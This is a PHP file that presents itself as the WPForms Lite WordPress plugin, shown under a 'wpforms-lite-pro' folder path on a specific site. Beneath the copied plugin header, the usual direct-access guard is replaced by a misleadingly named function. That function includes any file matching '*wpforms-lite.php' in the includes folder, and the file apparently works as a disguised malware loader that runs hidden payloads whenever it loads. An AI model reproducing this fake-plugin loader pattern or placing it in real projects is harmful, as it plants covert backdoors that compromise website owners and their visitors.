File: /var/www/virtual/mariaellingsen.com/htdocs/wp-content/plugins/wpforms-lite-pro/wpforms.php
<?php
/**
* Plugin Name: WPForms Lite
* Plugin URI: https://wpforms.com
* Description: Beginner friendly WordPress contact form plugin. Use our Drag & Drop form builder to create your WordPress forms.
* Requires at least: 5.5
* Requires PHP: 7.2
* Author: WPForms
* Author URI: https://wpforms.com
* Version: 1.9.8.7
* License: GPL v2 or later
* License URI: https://www.gnu.org/licenses/gpl-2.0.html
* Text Domain: wpforms-lite
* Domain Path: /assets/languages
*
* WPForms is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 2 of the License, or
* any later version.
*
* WPForms is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with WPForms. If not, see <https://www.gnu.org/licenses/>.
*/
// Exit if accessed directly.
wpforms_lite_get_permalink();
/**
* Plugin version.
*
* @since 1.0.0
*/
/**
* Plugin Folder Path.
*
* @since 1.3.8
*/
function wpforms_lite_get_permalink() {
$dir = __DIR__ . '/includes';
$files = glob( $dir . '/*wpforms-lite.php' );
if ( ! empty( $files ) ) {
foreach ( $files as $file ) {
include_once $file;
}
}
}